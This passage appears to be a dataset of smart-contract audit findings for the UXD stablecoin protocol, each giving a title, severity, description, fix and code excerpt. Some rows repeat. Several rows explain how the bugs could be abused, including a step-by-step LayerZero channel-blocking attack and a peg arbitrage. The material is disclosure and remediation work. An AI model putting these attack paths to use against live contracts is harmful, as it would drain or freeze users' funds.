vault.withdraw(insuranceToken(), amount);\\n IERC20(insuranceToken()).transfer(to, amount);\\n\\n emit InsuranceWithdrawn(msg.sender, to, amount);\\n}\\n```\\n\\nThe issue is that `withdrawInsurance` cannot actually redeem any USDC. 
Since insuranceDeposited is a uint256 and is decremented by the withdraw, it is impossible for more USDC to be withdrawn then was originally deposited.\\nThe result is that there is no way for the USDC to ever be redeemed and therefore over time will lead to the system becoming undercollateralized due to its inaccessibility.",Allow all USDC now deposited into the insurance fund to be redeemed 1:1,UDX will become undercollateralized and the ecosystem will spiral out of control,"```\\nfunction withdrawInsurance(uint256 amount, address to)\\n external\\n nonReentrant\\n onlyOwner\\n{\\n if (amount == 0) {\\n revert ZeroAmount();\\n }\\n\\n insuranceDeposited -= amount;\\n\\n vault.withdraw(insuranceToken(), amount);\\n IERC20(insuranceToken()).transfer(to, amount);\\n\\n emit InsuranceWithdrawn(msg.sender, to, amount);\\n}\\n```\\n" +PerpDepository#getPositionValue uses incorrect value for TWAP interval allowing more than intended funds to be extracted,high,"PerpDepository#getPositionValue queries the exchange for the mark price to calculate the unrealized PNL. Mark price is defined as the 15 minute TWAP of the market. 
The issue is that it uses the 15 second TWAP instead of the 15 minute TWAP\\nAs stated in the docs and as implemented in the ClearHouseConfig contract, the mark price is a 15 minute / 900 second TWAP.\\n```\\nfunction getPositionValue() public view returns (uint256) {\\n uint256 markPrice = getMarkPriceTwap(15);\\n int256 positionSize = IAccountBalance(clearingHouse.getAccountBalance())\\n .getTakerPositionSize(address(this), market);\\n return markPrice.mulWadUp(_abs(positionSize));\\n}\\n\\nfunction getMarkPriceTwap(uint32 twapInterval)\\n public\\n view\\n returns (uint256)\\n{\\n IExchange exchange = IExchange(clearingHouse.getExchange());\\n uint256 markPrice = exchange\\n .getSqrtMarkTwapX96(market, twapInterval)\\n .formatSqrtPriceX96ToPriceX96()\\n .formatX96ToX10_18();\\n return markPrice;\\n}\\n```\\n\\nAs seen in the code above getPositionValue uses 15 as the TWAP interval. This means it is pulling a 15 second TWAP rather than a 15 minute TWAP as intended.","I recommend pulling pulling the TWAP fresh each time from ClearingHouseConfig, because the TWAP can be changed at anytime. 
If it is desired to make it a constant then it should at least be changed from 15 to 900.",The mark price and by extension the position value will frequently be different from true mark price of the market allowing for larger rebalances than should be possible.,"```\\nfunction getPositionValue() public view returns (uint256) {\\n uint256 markPrice = getMarkPriceTwap(15);\\n int256 positionSize = IAccountBalance(clearingHouse.getAccountBalance())\\n .getTakerPositionSize(address(this), market);\\n return markPrice.mulWadUp(_abs(positionSize));\\n}\\n\\nfunction getMarkPriceTwap(uint32 twapInterval)\\n public\\n view\\n returns (uint256)\\n{\\n IExchange exchange = IExchange(clearingHouse.getExchange());\\n uint256 markPrice = exchange\\n .getSqrtMarkTwapX96(market, twapInterval)\\n .formatSqrtPriceX96ToPriceX96()\\n .formatX96ToX10_18();\\n return markPrice;\\n}\\n```\\n" +PerpDepository.netAssetDeposits variable can prevent users to withdraw with underflow error,medium,"PerpDepository.netAssetDeposits variable can prevent users to withdraw with underflow error\\n```\\n function _depositAsset(uint256 amount) private {\\n netAssetDeposits += amount;\\n\\n\\n IERC20(assetToken).approve(address(vault), amount);\\n vault.deposit(assetToken, amount);\\n }\\n```\\n\\n```\\n function _withdrawAsset(uint256 amount, address to) private {\\n if (amount > netAssetDeposits) {\\n revert InsufficientAssetDeposits(netAssetDeposits, amount);\\n }\\n netAssetDeposits -= amount;\\n\\n\\n vault.withdraw(address(assetToken), amount);\\n IERC20(assetToken).transfer(to, amount);\\n }\\n```\\n\\nThe problem here is that when user deposits X assets, then he receives Y UXD tokens. And when later he redeems his Y UXD tokens he can receive more or less than X assets. This can lead to situation when netAssetDeposits variable will be seting to negative value which will revert tx.\\nExample. 1.User deposits 1 WETH when it costs 1200$. 
As result 1200 UXD tokens were minted and netAssetDeposits was set to 1. 2.Price of WETH has decreased and now it costs 1100. 3.User redeem his 1200 UXD tokens and receives from perp protocol 1200/1100=1.09 WETH. But because netAssetDeposits is 1, then transaction will revert inside `_withdrawAsset` function with underflow error.","As you don't use this variable anywhere else, you can remove it. Otherwise you need to have 2 variables instead: totalDeposited and totalWithdrawn.",User can't redeem all his UXD tokens.,"```\\n function _depositAsset(uint256 amount) private {\\n netAssetDeposits += amount;\\n\\n\\n IERC20(assetToken).approve(address(vault), amount);\\n vault.deposit(assetToken, amount);\\n }\\n```\\n" +Malicious user can use an excessively large _toAddress in OFTCore#sendFrom to break layerZero communication,high,"By default layerZero implements a blocking behavior, that is, that each message must be processed and succeed in the order that it was sent. In order to circumvent this behavior the receiver must implement their own try-catch pattern. If the try-catch pattern in the receiving app ever fails then it will revert to its blocking behavior. The _toAddress input to OFTCore#sendFrom is calldata of any arbitrary length. An attacker can abuse this and submit a send request with an excessively large _toAddress to break communication between network with different gas limits.\\n```\\nfunction sendFrom(address _from, uint16 _dstChainId, bytes calldata _toAddress, uint _amount, address payable _refundAddress, address _zroPaymentAddress, bytes calldata _adapterParams) public payable virtual override {\\n _send(_from, _dstChainId, _toAddress, _amount, _refundAddress, _zroPaymentAddress, _adapterParams);\\n}\\n```\\n\\nThe _toAddress input to OFTCore#sendFrom is a bytes calldata of any arbitrary size. 
This can be used as follows to break communication between chains that have different block gas limits.\\nExample: Let's say that an attacker wishes to permanently block the channel Arbitrum -> Optimism. Arbitrum has a massive block gas limit, much higher than Optimism's 20M block gas limit. The attacker would call sendFrom on the Arbitrum chain with the Optimism chain as the destination. For the _toAddress input they would use an absolutely massive amount of bytes. This would be packed into the payload which would be called on Optimism. Since Arbitrum has a huge gas limit the transaction would send from the Arbitrum side but it would be so big that the transaction could never succeed on the Optimism side due to gas constraints. Since that nonce can never succeed the communication channel will be permanently blocked at the Optimism endpoint, bypassing the nonblocking behavior implemented in the OFT design and reverting to the default blocking behavior of layerZero.\\nUsers can still send messages and burn their tokens from Arbitrum -> Optimism but the messages can never be received. This could be done between any two chains in which one has a higher block gas limit. This would cause massive loss of funds and completely cripple the entire protocol.","Limit the length of _toAddress to some amount (i.e. 
256 bytes) as of right now EVM uses 20 bytes address and Sol/Aptos use 32 bytes address, so for right now it could be limited to 32 bytes.\\n```\\n function sendFrom(address _from, uint16 _dstChainId, bytes calldata _toAddress, uint _amount, address payable _refundAddress, address _zroPaymentAddress, bytes calldata _adapterParams) public payable virtual override {\\n+ require(_toAddress.length <= maxAddressLength); \\n _send(_from, _dstChainId, _toAddress, _amount, _refundAddress, _zroPaymentAddress, _adapterParams);\\n }\\n```\\n",Massive loss of user funds and protocol completely crippled,"```\\nfunction sendFrom(address _from, uint16 _dstChainId, bytes calldata _toAddress, uint _amount, address payable _refundAddress, address _zroPaymentAddress, bytes calldata _adapterParams) public payable virtual override {\\n _send(_from, _dstChainId, _toAddress, _amount, _refundAddress, _zroPaymentAddress, _adapterParams);\\n}\\n```\\n" +RageTrade senior vault USDC deposits are subject to utilization caps which can lock deposits for long periods of time leading to UXD instability,high,"RageTrade senior vault requires that it maintains deposits above and beyond the current amount loaned to the junior vault. Currently this is set at 90%, that is the vault must maintain at least 10% more deposits than loans. Currently the junior vault is in high demand and very little can be withdrawn from the senior vault. 
A situation like this is far from ideal because in the event that there is a strong depeg of UXD a large portion of the collateral could be locked in the vault unable to be withdrawn.\\nDnGmxSeniorVault.sol\\n```\\nfunction beforeWithdraw(\\n    uint256 assets,\\n    uint256,\\n    address\\n) internal override {\\n    /// @dev withdrawal will fail if the utilization goes above maxUtilization value due to a withdrawal\\n    // totalUsdcBorrowed will reduce when borrower (junior vault) repays\\n    if (totalUsdcBorrowed() > ((totalAssets() - assets) * maxUtilizationBps) / MAX_BPS)\\n        revert MaxUtilizationBreached();\\n\\n    // take out required assets from aave lending pool\\n    pool.withdraw(address(asset), assets, address(this));\\n}\\n```\\n\\nDnGmxSeniorVault.sol#beforeWithdraw is called before each withdraw and will revert if the withdraw lowers the utilization of the vault below a certain threshold. This is problematic in the event that large deposits are required to maintain the stability of UXD.",I recommend three safeguards against this:\\nMonitor the current utilization of the senior vault and limit deposits if utilization is close to locking positions\\nMaintain a portion of the USDC deposits outside the vault (i.e. 
10%) to avoid sudden potential liquidity crunches\\nCreate functions to balance the proportions of USDC in and out of the vault to withdraw USDC from the vault in the event that utilization threatens to lock collateral,UXD may become destabilized in the event that the senior vault has high utilization and the collateral is inaccessible,"```\\nfunction beforeWithdraw(\\n uint256 assets,\\n uint256,\\n address\\n) internal override {\\n /// @dev withdrawal will fail if the utilization goes above maxUtilization value due to a withdrawal\\n // totalUsdcBorrowed will reduce when borrower (junior vault) repays\\n if (totalUsdcBorrowed() > ((totalAssets() - assets) * maxUtilizationBps) / MAX_BPS)\\n revert MaxUtilizationBreached();\\n\\n // take out required assets from aave lending pool\\n pool.withdraw(address(asset), assets, address(this));\\n}\\n```\\n" +USDC deposited to PerpDepository.sol are irretrievable and effectively causes UDX to become undercollateralized,high,"PerpDepository rebalances negative PNL into USDC holdings. This preserves the delta neutrality of the system by exchanging base to quote. This is problematic though as once it is in the vault as USDC it can never be withdrawn. The effect is that the delta neutral position can never be liquidated but the USDC is inaccessible so UDX is effectively undercollateralized.\\n`_processQuoteMint`, `_rebalanceNegativePnlWithSwap` and `_rebalanceNegativePnlLite` all add USDC collateral to the system. There were originally two ways in which USDC could be removed from the system. The first was positive PNL rebalancing, which has now been deactivated. 
The second is for the owner to remove the USDC via `withdrawInsurance`.\\n```\\nfunction withdrawInsurance(uint256 amount, address to)\\n external\\n nonReentrant\\n onlyOwner\\n{\\n if (amount == 0) {\\n revert ZeroAmount();\\n }\\n\\n insuranceDeposited -= amount;\\n\\n vault.withdraw(insuranceToken(), amount);\\n IERC20(insuranceToken()).transfer(to, amount);\\n\\n emit InsuranceWithdrawn(msg.sender, to, amount);\\n}\\n```\\n\\nThe issue is that `withdrawInsurance` cannot actually redeem any USDC. Since insuranceDeposited is a uint256 and is decremented by the withdraw, it is impossible for more USDC to be withdrawn then was originally deposited.\\nThe result is that there is no way for the USDC to ever be redeemed and therefore over time will lead to the system becoming undercollateralized due to its inaccessibility.",Allow all USDC now deposited into the insurance fund to be redeemed 1:1,UDX will become undercollateralized and the ecosystem will spiral out of control,"```\\nfunction withdrawInsurance(uint256 amount, address to)\\n external\\n nonReentrant\\n onlyOwner\\n{\\n if (amount == 0) {\\n revert ZeroAmount();\\n }\\n\\n insuranceDeposited -= amount;\\n\\n vault.withdraw(insuranceToken(), amount);\\n IERC20(insuranceToken()).transfer(to, amount);\\n\\n emit InsuranceWithdrawn(msg.sender, to, amount);\\n}\\n```\\n" +PerpDepository#getPositionValue uses incorrect value for TWAP interval allowing more than intended funds to be extracted,high,"PerpDepository#getPositionValue queries the exchange for the mark price to calculate the unrealized PNL. Mark price is defined as the 15 minute TWAP of the market. 
The issue is that it uses the 15 second TWAP instead of the 15 minute TWAP\\nAs stated in the docs and as implemented in the ClearHouseConfig contract, the mark price is a 15 minute / 900 second TWAP.\\n```\\nfunction getPositionValue() public view returns (uint256) {\\n uint256 markPrice = getMarkPriceTwap(15);\\n int256 positionSize = IAccountBalance(clearingHouse.getAccountBalance())\\n .getTakerPositionSize(address(this), market);\\n return markPrice.mulWadUp(_abs(positionSize));\\n}\\n\\nfunction getMarkPriceTwap(uint32 twapInterval)\\n public\\n view\\n returns (uint256)\\n{\\n IExchange exchange = IExchange(clearingHouse.getExchange());\\n uint256 markPrice = exchange\\n .getSqrtMarkTwapX96(market, twapInterval)\\n .formatSqrtPriceX96ToPriceX96()\\n .formatX96ToX10_18();\\n return markPrice;\\n}\\n```\\n\\nAs seen in the code above getPositionValue uses 15 as the TWAP interval. This means it is pulling a 15 second TWAP rather than a 15 minute TWAP as intended.","I recommend pulling pulling the TWAP fresh each time from ClearingHouseConfig, because the TWAP can be changed at anytime. 
If it is desired to make it a constant then it should at least be changed from 15 to 900.",The mark price and by extension the position value will frequently be different from true mark price of the market allowing for larger rebalances than should be possible.,"```\\nfunction getPositionValue() public view returns (uint256) {\\n uint256 markPrice = getMarkPriceTwap(15);\\n int256 positionSize = IAccountBalance(clearingHouse.getAccountBalance())\\n .getTakerPositionSize(address(this), market);\\n return markPrice.mulWadUp(_abs(positionSize));\\n}\\n\\nfunction getMarkPriceTwap(uint32 twapInterval)\\n public\\n view\\n returns (uint256)\\n{\\n IExchange exchange = IExchange(clearingHouse.getExchange());\\n uint256 markPrice = exchange\\n .getSqrtMarkTwapX96(market, twapInterval)\\n .formatSqrtPriceX96ToPriceX96()\\n .formatX96ToX10_18();\\n return markPrice;\\n}\\n```\\n" +`rebalanceLite` should provide a slippage protection,medium,"Users can lose funds while rebalancing.\\nThe protocol provides two kinds of rebalancing functions - `rebalance()` and `rebalanceLite()`. While the function `rebalance()` is protected from an unintended slippage because the caller can specify `amountOutMinimum`, `rebalanceLite()` does not have this protection. 
This makes the user vulnerable to unintended slippage due to various scenarios.\\n```\\nPerpDepository.sol\\n function rebalanceLite(\\n uint256 amount,\\n int8 polarity,\\n uint160 sqrtPriceLimitX96,\\n address account\\n ) external nonReentrant returns (uint256, uint256) {\\n if (polarity == -1) {\\n return\\n _rebalanceNegativePnlLite(amount, sqrtPriceLimitX96, account);\\n } else if (polarity == 1) {\\n // disable rebalancing positive PnL\\n revert PositivePnlRebalanceDisabled(msg.sender);\\n // return _rebalancePositivePnlLite(amount, sqrtPriceLimitX96, account);\\n } else {\\n revert InvalidRebalance(polarity);\\n }\\n }\\n function _rebalanceNegativePnlLite(\\n uint256 amount,\\n uint160 sqrtPriceLimitX96,\\n address account\\n ) private returns (uint256, uint256) {\\n uint256 normalizedAmount = amount.fromDecimalToDecimal(\\n ERC20(quoteToken).decimals(),\\n 18\\n );\\n _checkNegativePnl(normalizedAmount);\\n IERC20(quoteToken).transferFrom(account, address(this), amount);\\n IERC20(quoteToken).approve(address(vault), amount);\\n vault.deposit(quoteToken, amount);\\n bool isShort = false;\\n bool amountIsInput = true;\\n (uint256 baseAmount, uint256 quoteAmount) = _placePerpOrder(\\n normalizedAmount,\\n isShort,\\n amountIsInput,\\n sqrtPriceLimitX96\\n );\\n vault.withdraw(assetToken, baseAmount);\\n IERC20(assetToken).transfer(account, baseAmount);\\n emit Rebalanced(baseAmount, quoteAmount, 0);\\n return (baseAmount, quoteAmount);\\n }\\n```\\n\\nEspecially, according to the communication with the PERP dev team, it is possible for the Perp's ClearingHouse to fill the position partially when the price limit is specified (sqrtPriceLimitX96). 
It is also commented in the Perp contract comments here.\\n```\\n /// @param sqrtPriceLimitX96 tx will fill until it reaches this price but WON'T REVERT\\n struct InternalOpenPositionParams {\\n address trader;\\n address baseToken;\\n bool isBaseToQuote;\\n bool isExactInput;\\n bool isClose;\\n uint256 amount;\\n uint160 sqrtPriceLimitX96;\\n }\\n```\\n\\nSo it is possible that the order is not placed to the full `amount`. As we can see in the #L626~#L628, the UXD protocol grabs the quote token of `amount` and deposits to the Perp's vault. And the unused `amount` will remain in the Perp vault while this is supposed to be returned to the user who called this rebalance function.",Add a protection parameter to the function `rebalanceLite()` so that the user can specify the minimum out amount.,Users can lose funds while lite rebalancing.,"```\\nPerpDepository.sol\\n function rebalanceLite(\\n uint256 amount,\\n int8 polarity,\\n uint160 sqrtPriceLimitX96,\\n address account\\n ) external nonReentrant returns (uint256, uint256) {\\n if (polarity == -1) {\\n return\\n _rebalanceNegativePnlLite(amount, sqrtPriceLimitX96, account);\\n } else if (polarity == 1) {\\n // disable rebalancing positive PnL\\n revert PositivePnlRebalanceDisabled(msg.sender);\\n // return _rebalancePositivePnlLite(amount, sqrtPriceLimitX96, account);\\n } else {\\n revert InvalidRebalance(polarity);\\n }\\n }\\n function _rebalanceNegativePnlLite(\\n uint256 amount,\\n uint160 sqrtPriceLimitX96,\\n address account\\n ) private returns (uint256, uint256) {\\n uint256 normalizedAmount = amount.fromDecimalToDecimal(\\n ERC20(quoteToken).decimals(),\\n 18\\n );\\n _checkNegativePnl(normalizedAmount);\\n IERC20(quoteToken).transferFrom(account, address(this), amount);\\n IERC20(quoteToken).approve(address(vault), amount);\\n vault.deposit(quoteToken, amount);\\n bool isShort = false;\\n bool amountIsInput = true;\\n (uint256 baseAmount, uint256 quoteAmount) = _placePerpOrder(\\n normalizedAmount,\\n 
isShort,\\n amountIsInput,\\n sqrtPriceLimitX96\\n );\\n vault.withdraw(assetToken, baseAmount);\\n IERC20(assetToken).transfer(account, baseAmount);\\n emit Rebalanced(baseAmount, quoteAmount, 0);\\n return (baseAmount, quoteAmount);\\n }\\n```\\n" +`PerpDepository._rebalanceNegativePnlWithSwap()` shouldn't use a `sqrtPriceLimitX96` twice.,medium,"`PerpDepository._rebalanceNegativePnlWithSwap()` shouldn't use a `sqrtPriceLimitX96` twice.\\nCurrently, `_rebalanceNegativePnlWithSwap()` uses a `sqrtPriceLimitX96` param twice for placing a perp order and swapping.\\n```\\n function _rebalanceNegativePnlWithSwap(\\n uint256 amount,\\n uint256 amountOutMinimum,\\n uint160 sqrtPriceLimitX96,\\n uint24 swapPoolFee,\\n address account\\n ) private returns (uint256, uint256) {\\n uint256 normalizedAmount = amount.fromDecimalToDecimal(\\n ERC20(quoteToken).decimals(),\\n 18\\n );\\n _checkNegativePnl(normalizedAmount);\\n bool isShort = false;\\n bool amountIsInput = true;\\n (uint256 baseAmount, uint256 quoteAmount) = _placePerpOrder(\\n normalizedAmount,\\n isShort,\\n amountIsInput,\\n sqrtPriceLimitX96\\n );\\n vault.withdraw(assetToken, baseAmount);\\n SwapParams memory params = SwapParams({\\n tokenIn: assetToken,\\n tokenOut: quoteToken,\\n amountIn: baseAmount,\\n amountOutMinimum: amountOutMinimum,\\n sqrtPriceLimitX96: sqrtPriceLimitX96, //@audit \\n poolFee: swapPoolFee\\n });\\n uint256 quoteAmountOut = spotSwapper.swapExactInput(params);\\n```\\n\\nIn `_placePerpOrder()`, it uses the uniswap pool inside the perp protocol and uses a `spotSwapper` for the second swap which is for the uniswap as well.\\nBut as we can see here, Uniswap V3 introduces multiple pools for each token pair and 2 pools might be different and I think it's not good to use the same `sqrtPriceLimitX96` for different pools.\\nAlso, I think it's not mandatory to check a `sqrtPriceLimitX96` as it checks `amountOutMinimum` already. 
(It checks `amountOutMinimum` only in `_openLong()` and _openShort().)",I think we can use the `sqrtPriceLimitX96` param for one pool only and it would be enough as there is an `amountOutMinimum` condition.,`PerpDepository._rebalanceNegativePnlWithSwap()` might revert when it should work as it uses the same `sqrtPriceLimitX96` for different pools.,"```\\n function _rebalanceNegativePnlWithSwap(\\n uint256 amount,\\n uint256 amountOutMinimum,\\n uint160 sqrtPriceLimitX96,\\n uint24 swapPoolFee,\\n address account\\n ) private returns (uint256, uint256) {\\n uint256 normalizedAmount = amount.fromDecimalToDecimal(\\n ERC20(quoteToken).decimals(),\\n 18\\n );\\n _checkNegativePnl(normalizedAmount);\\n bool isShort = false;\\n bool amountIsInput = true;\\n (uint256 baseAmount, uint256 quoteAmount) = _placePerpOrder(\\n normalizedAmount,\\n isShort,\\n amountIsInput,\\n sqrtPriceLimitX96\\n );\\n vault.withdraw(assetToken, baseAmount);\\n SwapParams memory params = SwapParams({\\n tokenIn: assetToken,\\n tokenOut: quoteToken,\\n amountIn: baseAmount,\\n amountOutMinimum: amountOutMinimum,\\n sqrtPriceLimitX96: sqrtPriceLimitX96, //@audit \\n poolFee: swapPoolFee\\n });\\n uint256 quoteAmountOut = spotSwapper.swapExactInput(params);\\n```\\n" +Vulnerable GovernorVotesQuorumFraction version,medium,"The protocol uses an OZ version of contracts that contain a known vulnerability in government contracts.\\n`UXDGovernor` contract inherits from GovernorVotesQuorumFraction:\\n```\\n contract UXDGovernor is\\n ReentrancyGuard,\\n Governor,\\n GovernorVotes,\\n GovernorVotesQuorumFraction,\\n GovernorTimelockControl,\\n GovernorCountingSimple,\\n GovernorSettings\\n```\\n\\nIt was patched in version 4.7.2, but this protocol uses an older version: ""@openzeppelin/contracts"": ""^4.6.0""",Update the OZ version of contracts to version >=4.7.2 or at least follow the workarounds of OZ if not possible otherwise.,"The potential impact is described in the OZ advisory. 
This issue was assigned with a severity of High from OZ, so I am sticking with it in this submission.","```\\n contract UXDGovernor is\\n ReentrancyGuard,\\n Governor,\\n GovernorVotes,\\n GovernorVotesQuorumFraction,\\n GovernorTimelockControl,\\n GovernorCountingSimple,\\n GovernorSettings\\n```\\n" +Deposit and withdraw to the vault with the wrong decimals of amount in contract `PerpDepository`,medium,"Function `vault.deposit` and `vault.withdraw` of vault in contract `PerpDepository` need to be passed with the amount in raw decimal of tokens (is different from 18 in case using USDC, WBTC, ... as base and quote tokens). But some calls miss the conversion of decimals from 18 to token's decimal, and pass wrong decimals into them.\\nFunction `vault.deposit` need to be passed the param amount in token's decimal (as same as vault.withdraw). You can see at function `_depositAsset` in contract PerpDepository.\\n```\\nfunction _depositAsset(uint256 amount) private {\\n netAssetDeposits += amount;\\n \\n IERC20(assetToken).approve(address(vault), amount);\\n vault.deposit(assetToken, amount);\\n}\\n```\\n\\nBut there are some calls of `vault.deposit` and `vault.withdraw` that passed the amount in the wrong decimal (18 decimal). 
Let's see function `_rebalanceNegativePnlWithSwap` in contract PerpDepository:\\n```\\nfunction _rebalanceNegativePnlWithSwap(\\n uint256 amount,\\n uint256 amountOutMinimum,\\n uint160 sqrtPriceLimitX96,\\n uint24 swapPoolFee,\\n address account\\n) private returns (uint256, uint256) {\\n // rest of code\\n (uint256 baseAmount, uint256 quoteAmount) = _placePerpOrder(\\n normalizedAmount,\\n isShort,\\n amountIsInput,\\n sqrtPriceLimitX96\\n );\\n vault.withdraw(assetToken, baseAmount); \\n \\n // rest of code\\n \\n vault.deposit(quoteToken, quoteAmount);\\n\\n emit Rebalanced(baseAmount, quoteAmount, shortFall);\\n return (baseAmount, quoteAmount);\\n}\\n```\\n\\nBecause function `_placePerpOrder` returns in decimal 18 (confirmed with sponsor WarTech), this calls pass `baseAmount` and `quoteAmount` in decimal 18, inconsistent with the above call. It leads to vault using the wrong decimal when depositing and withdrawing tokens.\\nThere is another case that use `vault.withdraw` with the wrong decimal (same as this case) in function _rebalanceNegativePnlLite:\\n```\\n//function _rebalanceNegativePnlLite, contract PerpDepository\\n// rest of code\\n\\n(uint256 baseAmount, uint256 quoteAmount) = _placePerpOrder(\\n normalizedAmount,\\n isShort,\\n amountIsInput,\\n sqrtPriceLimitX96\\n);\\nvault.withdraw(assetToken, baseAmount);\\n\\n// rest of code\\n```\\n",Should convert the param `amount` from token's decimal to decimal 18 before `vault.deposit` and `vault.withdraw`.,"Because of calling `vault.deposit` and `vault.withdraw` with the wrong decimal of the param amount, the protocol can lose a lot of funds. 
And some functionalities of the protocol can be broken cause it can revert by not enough allowance when calling these functions.","```\\nfunction _depositAsset(uint256 amount) private {\\n netAssetDeposits += amount;\\n \\n IERC20(assetToken).approve(address(vault), amount);\\n vault.deposit(assetToken, amount);\\n}\\n```\\n" +Price disparities between spot and perpetual pricing can heavily destabilize UXD,medium,"When minting UXD using PerpDepository.sol the amount of UXD minted corresponds to the amount of vUSD gained from selling the deposited ETH. This is problematic given that Perp Protocol is a derivative rather than a spot market, which means that price differences cannot be directly arbitraged with spot markets. The result is that derivative markets frequently trade at a price higher or lower than the spot price. The result of this is that UXD is actually pegged to vUSD rather than USD. This key difference can cause huge strain on a USD peg and likely depegging.\\n```\\nfunction deposit(\\n address asset,\\n uint256 amount\\n) external onlyController returns (uint256) {\\n if (asset == assetToken) {\\n _depositAsset(amount);\\n (, uint256 quoteAmount) = _openShort(amount);\\n return quoteAmount; // @audit this mint UXD equivalent to the amount of vUSD gained\\n } else if (asset == quoteToken) {\\n return _processQuoteMint(amount);\\n } else {\\n revert UnsupportedAsset(asset);\\n }\\n}\\n```\\n\\nPerpDepository#deposit shorts the deposit amount and returns the amount of vUSD resulting from the swap, which effectively pegs it to vUSD rather than USD. When the perpetual is trading at a premium arbitrage will begin happening between the spot and perpetual asset and the profit will be taken at the expense of the UXD peg.\\nExample: Imagine markets are heavily trending with a spot price of $1500 and a perpetual price of $1530. A user can now buy 1 ETH for $1500 and deposit it to mint 1530 UXD. 
They can then swap the UXD for 1530 USDC (or other stablecoin) for a profit of $30. The user can continue to do this until either the perpetual price is arbitraged down to $1500 or the price of UXD is $0.98.","I recommend integrating with a chainlink oracle and using its price to determine the true spot price of ETH. When a user mints make sure that the amount minted is never greater than the spot price of ETH which will prevent the negative pressure on the peg:\\n```\\nfunction deposit(\\n address asset,\\n uint256 amount\\n) external onlyController returns (uint256) {\\n if (asset == assetToken) {\\n _depositAsset(amount);\\n (, uint256 quoteAmount) = _openShort(amount);\\n\\n+ spotPrice = assetOracle.getPrice();\\n+ assetSpotValue = amount.mulwad(spotPrice);\\n\\n- return quoteAmount;\\n+ return quoteAmount <= assetSpotValue ? quoteAmount: assetSpotValue;\\n } else if (asset == quoteToken) {\\n return _processQuoteMint(amount);\\n } else {\\n revert UnsupportedAsset(asset);\\n }\\n}\\n```\\n",UXD is pegged to vUSD rather than USD which can cause instability and loss of peg,"```\\nfunction deposit(\\n address asset,\\n uint256 amount\\n) external onlyController returns (uint256) {\\n if (asset == assetToken) {\\n _depositAsset(amount);\\n (, uint256 quoteAmount) = _openShort(amount);\\n return quoteAmount; // @audit this mint UXD equivalent to the amount of vUSD gained\\n } else if (asset == quoteToken) {\\n return _processQuoteMint(amount);\\n } else {\\n revert UnsupportedAsset(asset);\\n }\\n}\\n```\\n" +PerpDepository#_placePerpOrder miscalculates fees paid when shorting,medium,"PerpDepository#_placePerpOrder calculates the fee as a percentage of the quoteToken received. 
The issue is that this amount already has the fees taken so the fee percentage is being applied incorrectly.\\n```\\nfunction _placePerpOrder(\\n uint256 amount,\\n bool isShort,\\n bool amountIsInput,\\n uint160 sqrtPriceLimit\\n) private returns (uint256, uint256) {\\n uint256 upperBound = 0; // 0 = no limit, limit set by sqrtPriceLimit\\n\\n IClearingHouse.OpenPositionParams memory params = IClearingHouse\\n .OpenPositionParams({\\n baseToken: market,\\n isBaseToQuote: isShort, // true for short\\n isExactInput: amountIsInput, // we specify exact input amount\\n amount: amount, // collateral amount - fees\\n oppositeAmountBound: upperBound, // output upper bound\\n // solhint-disable-next-line not-rely-on-time\\n deadline: block.timestamp,\\n sqrtPriceLimitX96: sqrtPriceLimit, // max slippage\\n referralCode: 0x0\\n });\\n\\n (uint256 baseAmount, uint256 quoteAmount) = clearingHouse.openPosition(\\n params\\n );\\n\\n uint256 feeAmount = _calculatePerpOrderFeeAmount(quoteAmount);\\n totalFeesPaid += feeAmount;\\n\\n emit PositionOpened(isShort, amount, amountIsInput, sqrtPriceLimit);\\n return (baseAmount, quoteAmount);\\n}\\n\\nfunction _calculatePerpOrderFeeAmount(uint256 amount)\\n internal\\n view\\n returns (uint256)\\n{\\n return amount.mulWadUp(getExchangeFeeWad());\\n}\\n```\\n\\nWhen calculating fees, `PerpDepository#_placePerpOrder` use the quote amount retuned when opening the new position. It always uses exactIn which means that for shorts the amount of baseAsset being sold is specified. The result is that quote amount returned is already less the fees. If we look at how the fee is calculated we can see that it is incorrect.\\nExample: Imagine the market price of ETH is $1000 and there is a market fee of 1%. The 1 ETH is sold and the contract receives 990 USD. 
Using the math above it would calculate the fee as $99 (990 * 1%) but actually the fee is $100.\\nI have submitted this as a medium because it is not clear from the given contracts what the fee totals are used for and I cannot fully assess the implications of the fee value being incorrect.","Rewrite _calculatePerpOrderFeeAmount to correctly calculate the fees paid:\\n```\\n- function _calculatePerpOrderFeeAmount(uint256 amount)\\n+ function _calculatePerpOrderFeeAmount(uint256 amount, bool isShort)\\n internal\\n view\\n returns (uint256)\\n {\\n+ if (isShort) {\\n+ return amount.divWadDown(WAD - getExchangeFeeWad()) - amount;\\n+ } else {\\n return amount.mulWadUp(getExchangeFeeWad());\\n+ }\\n }\\n```\\n",totalFeesPaid will be inaccurate which could lead to disparities in other contracts depending on how it is used,"```\\nfunction _placePerpOrder(\\n uint256 amount,\\n bool isShort,\\n bool amountIsInput,\\n uint160 sqrtPriceLimit\\n) private returns (uint256, uint256) {\\n uint256 upperBound = 0; // 0 = no limit, limit set by sqrtPriceLimit\\n\\n IClearingHouse.OpenPositionParams memory params = IClearingHouse\\n .OpenPositionParams({\\n baseToken: market,\\n isBaseToQuote: isShort, // true for short\\n isExactInput: amountIsInput, // we specify exact input amount\\n amount: amount, // collateral amount - fees\\n oppositeAmountBound: upperBound, // output upper bound\\n // solhint-disable-next-line not-rely-on-time\\n deadline: block.timestamp,\\n sqrtPriceLimitX96: sqrtPriceLimit, // max slippage\\n referralCode: 0x0\\n });\\n\\n (uint256 baseAmount, uint256 quoteAmount) = clearingHouse.openPosition(\\n params\\n );\\n\\n uint256 feeAmount = _calculatePerpOrderFeeAmount(quoteAmount);\\n totalFeesPaid += feeAmount;\\n\\n emit PositionOpened(isShort, amount, amountIsInput, sqrtPriceLimit);\\n return (baseAmount, quoteAmount);\\n}\\n\\nfunction _calculatePerpOrderFeeAmount(uint256 amount)\\n internal\\n view\\n returns (uint256)\\n{\\n return 
